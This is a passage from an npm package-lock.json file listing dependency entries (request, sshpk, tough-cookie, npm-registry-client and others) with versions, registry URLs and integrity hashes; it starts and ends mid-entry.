"https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": "*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, "engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." }, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "dependencies": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": 